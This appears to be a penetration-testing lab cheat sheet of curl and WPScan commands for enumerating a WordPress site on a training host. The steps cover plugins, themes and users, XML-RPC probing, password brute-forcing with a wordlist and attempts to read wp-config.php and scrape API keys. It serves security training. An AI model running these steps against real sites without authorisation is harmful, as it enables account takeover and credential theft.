1.-Wordpress-discovery-and-enumeration
1. Basic WordPress Identification
Perform initial checks to confirm if a website is running WordPress.
curl -s http://blog.inlanefreight.local/robots.txt # Check for disallowed paths
curl -s http://blog.inlanefreight.local/wp-admin/ # Observe redirection behavior
curl -s http://blog.inlanefreight.local/wp-content/plugins/ # Check for plugin directory
curl -s http://blog.inlanefreight.local/wp-content/themes/ # Check for theme directory2. WordPress Version and Theme Enumeration
Identify the WordPress version and active themes.
curl -s http://blog.inlanefreight.local | grep -i "WordPress" # Check for version details
curl -s http://blog.inlanefreight.local/ | grep -i "themes" # Identify themes
curl -s http://blog.inlanefreight.local/wp-content/themes/transport-gravity/style.css # Check theme stylesheet
curl -s http://blog.inlanefreight.local/wp-content/themes/transport-gravity/readme.txt # Check theme readme3. Plugin Enumeration
Discover installed plugins which may have known vulnerabilities.
curl -s http://blog.inlanefreight.local/ | grep -i "plugins"
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/readme.txt # Check for version info
curl -s http://blog.inlanefreight.local/?p=1 | grep -i "plugins" # Look for references in page content4. User Enumeration (Manual)
Detect valid usernames using login response differences.
curl -s -I http://blog.inlanefreight.local/wp-login.php -d "log=admin&pwd=invalid" # Check response for valid user
curl -s -I http://blog.inlanefreight.local/wp-login.php -d "log=invalid&pwd=invalid" # Check response for invalid user5. WPScan Enumeration
Use WPScan for automated WordPress enumeration.
sudo gem install wpscan
wpscan -h
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token YOUR_API_TOKENWPScan Advanced Enumeration
sudo wpscan --url http://blog.inlanefreight.local --enumerate u,p,t # Enumerate users, plugins, and themesWPScan Brute-force Attack
sudo wpscan --url http://blog.inlanefreight.local --passwords /usr/share/wordlists/rockyou.txt --usernames admin,johnWPScan with Proxy
sudo wpscan --url http://blog.inlanefreight.local --proxy 127.0.0.1:80806. XML-RPC Checks
Check if XML-RPC is enabled, which can be exploited for brute-force attacks.
curl -i http://blog.inlanefreight.local/xmlrpc.phpXML-RPC Exploitation
Check if system.multicall can be used for brute-force attacks.
curl -X POST -d '<methodCall><methodName>system.listMethods</methodName></methodCall>' http://blog.inlanefreight.local/xmlrpc.php7. Additional Security Checks
Robots.txt Insights
Identify restricted areas and test for misconfigurations.
curl -s http://blog.inlanefreight.local/robots.txt | grep "Disallow"Test if restricted files are still accessible:
curl -s http://blog.inlanefreight.local/wp-config.phpPage Source Analysis
Extract useful information such as API keys and endpoints.
curl -s http://blog.inlanefreight.local | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*"Detect Open Directory Listings
curl -s http://blog.inlanefreight.local/wp-content/uploads/Last updated